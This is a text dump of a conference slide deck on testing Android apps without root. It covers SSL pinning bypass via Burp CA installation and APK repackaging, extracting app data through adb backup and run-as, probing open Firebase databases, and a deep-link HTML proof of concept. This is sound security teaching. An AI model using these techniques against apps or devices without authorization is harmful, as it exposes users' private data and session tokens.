Kunwar Atul presented techniques for pentesting Android applications without root access. This included bypassing SSL pinning by modifying the app's manifest to allow user certificates, extracting sensitive data from backup files without root using ADB, and exploiting insecure Firebase databases and deep links. Deep links could be triggered via ADB to load attacker URLs within an app's webview. References were provided on SSL pinning bypass with Burp Suite, Frida, and modifying apps; reading data without root; and exploiting Firebase and deep links. The presentation did not cover Android architecture, tools like Drozer and Apktool, or lab setups.
2. root@whoami
• Kunwar Atul
• Yet another Appsec and DevSecOps Guy
• Break – Fix – Repeat
• Part time Bug Hunter
• Synack Red Team Member
• OWASP MASVS Hindi Contributor (Ongoing Project)
• DevSecOps University Contributor
• I Love Knowing What’s Going On (emerging vulns, tools, PoC), CTFs,
Offensive Security Work, Cricket, and no compromise with food and
coffee.
• Social media- kunwaratulhax0r
3. Agenda
• What We Will Be Not Talking About
• SSL Pinning Bypass
• Reading Sensitive Data Without Rooted
Device
• Exploiting Insecure Firebase Database
• Deep Links
• References
• Q/A
4. What We Will Be Not Talking About
• Android Architecture
• How to Use Drozer, ApkTool, JD-GUI, Dex2jar.
• Lab Setup
• Burp Configuration etc.
Because??
6. SSL Pinning Bypass
• Use Xposed + SSLUnpinning for bypassing the certificate, but if the super tricky
SSL Pinning is implemented then you can simply decompile the apk via apktool
and change protocol from https to http, compile back and sign, create a rule in
Charles that replaces the protocol from https to http.
Source: https://www.hackerone.com/blog/AndroidHackingMonth-qa-with-bagipro
7. SSL Pinning Bypass
You can install Burp as a System Level Trusted Certificate
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
8. SSL Pinning Bypass
• Android wants the certificate to be in PEM format, and to have the filename
equal to the subject_hash_old value appended with .0
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
9. SSL Pinning Bypass
• Copy the certificate to the device We can use adb to copy the certificate over, but
since it has to be copied to the /system filesystem, we have to remount it as
writable. As root, this is easy with adb remount.
• adb root
• adb remount
• adb push 9a5ba575.0 /sdcard/
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
10. SSL Pinning Bypass
• The just drop into a shell (adb shell) and move the file to
/system/etc/security/cacerts and chmod it to 644:
• mv /sdcard/9a5ba575.0 /system/etc/security/cacerts/
• chmod 644 /system/etc/security/cacerts/9a5ba575.0
• Lastly, we have to full reboot the device with either adb reboot or a power cycle.
• After the device reboots, browsing to Settings -> Security -> Trusted Credentials
should show the new “Portswigger CA” as a system trusted CA.
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
11. SSL Pinning Bypass
• Modifying and repackaging an app
• If you don’t have root or don’t want to modify the system trusted certificates, you can install
the Burp CA as a user cert and then modify the specific APK you want to MitM.
• Starting with Nougat, apps will ignore user-installed certificates by default. This is evident by
looking at logcat output when launching the app:
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
12. SSL Pinning Bypass
• Without a network security config, the app will only trust system CAs and will not
honor the user installed Burp certificate.
• To get around this, it involves:
• Disassembling the APK
• Adding a new XML resource to define a network security profile
• Modifying AndroidManifest.xml
• Repackaging and self-signing the APK
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
13. SSL Pinning Bypass
• Next, add a new network security config by creating the file network_security_config.xml
in the res/xml directory:
1. <network-security-config>
2. <base-config>
3. <trust-anchors>
4. <!-- Trust preinstalled CAs -->
5. <certificates src="system" />
6. <!-- Additionally trust user added CAs -->
7. <certificates src="user" />
8. </trust-anchors>
9. </base-config>
10. </network-security-config>
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
14. SSL Pinning Bypass
• Define the network security config in AndroidManifest.xml file, in the <application> tag
add the android:networkSecurityConfig attribute.
• Reassemble and sign the apk. For self sign we can use keytool to create a new keystore
and key, then with the help of jarsigner sign the new apk.
https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
<application android:allowBackup="true" android:networkSecurityConfig="@xml/network_security_config"
...etc...>
15. SSL Pinning Bypass
• Apart from this, we can use Frida as well for bypassing the SSL Pinning. You can follow
below blog for more understanding about Frida.
https://medium.com/@ved_wayal/hail-frida-the-universal-ssl-pinning-bypass-for-android-
e9e1d733d29
16. SSL Pinning Bypass
• Apart from this, we can use Frida as well for bypassing the SSL Pinning. You can follow
below blog for more understanding about Frida.
https://medium.com/@ved_wayal/hail-frida-the-universal-ssl-pinning-bypass-for-android-
e9e1d733d29
17. Reading Sensitive Data Without Root
• Application stores data in /data/data/app.packagename/shared_prefs/SensitiveData.xml
• Via rooted device you can read data like this,
• adb shell cat data/data/app.packagename/shared_prefs/SensitiveData.xml
And output will be like this,
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="email">test@test.com</string>
<string name=“name">Kunwar atul</string>
<string name=“username">kunwaratulhax0r</string>
<string name=“phoneNumber">9876543210</string>
</map
18. Reading Sensitive Data Without Root
• But What If Device is UnRooted?????
• We already knows that application is storing data in
data/data/app.packagename/shared_prefs/ folder. For achieving this we can use
Android allowBackup feature. We know that this feature allow us to perform a backup of
an application via ADB.
• Using ADB run the following command, Once you will execute this command it will ask the
device for backing up the data, if password is required, fill up or if there is no password
then leave it blank.
• adb backup -f backup.ab -f app.packagename
19. Reading Sensitive Data Without Root
• Once we got the backup.ab, we will use a open source tool called android-backup-
extractor for extracting the data from backup file.
• With the help of this tool, we will turn the backup file into a tar archive.
• Extract it tar xvf tarfile and we will be able to read the sensitive data file, which was stored
in data/data.
Here, You can read all the data including SQLite databases, images, app’s
configuration files and security tokens etc.
20. Reading Sensitive Data Without Root
• We can achieve sensitive data with Debuggable method.
• You can check this in AndroidManifest.xml file (android:debuggable=“true”).
• Now check which applications are connected to debugging socket(@jdwp-control), type adb jdwp and it will
list the PIDs (Process Identifiers) of the app which can be debugged.
• Now check which PID belongs to the target application,
• adb shell ps | grep PID
• Now type adb shell, with the help of run-as binary we can execute command as com.apptest.data application.
Now you can extract the data or run an arbitary code using application permission.
https://manifestsecurity.com/android-application-security-part-21/
21. Exploiting Insecure Firebase Database
• For achieving this, simply decompile the apk and go to Resources > resources.arsc > res
>values > strings.xml
• Search for *.firebaseio.com in xml file, navigate to the browser >
https://*.firebaseio.com/.json, you might find read access to the database.
• If the site gives you null or response in json, means read permission is enabled and you
need to test for the write permission, here is the script through which you can achieve
this, https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit
https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/
22. Deep Links
• Deep linking is a methodology for launching a native mobile apps via a link.
• It connects a unique URL to a defined action in mobile app, seamlessly linking to relevant
content.
• Once triggered, the deeplink would direct users to load any attacker-controlled URL within
a webview
• Example:
• <data android:host="user" android:pathPrefix="/" android:scheme=“abcd"/>
• <data android:host="user" android:pathPrefix="/" android:scheme=“abcde"/>
Means we can use abcd://user/user-id or abcde://user/user-id
23. Deep Links
• Here is a html POC,
<!DOCTYPE html>
<html>
<a href=“abcd://user/<any user-id>/follow">Demo Page</a>
</html>
24. Deep Links
• Exploiting Deep Links via ADB, let’s analyse below androidmanifest.xml code,
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data android:scheme="content" />
<data android:scheme="file" />
<data android:mimeType="text/plain" />
<data android:host="*" />
</intent-filter>
adb shell am start -W -a android.intent.action.VIEW -d "example://gizmos" com.companyname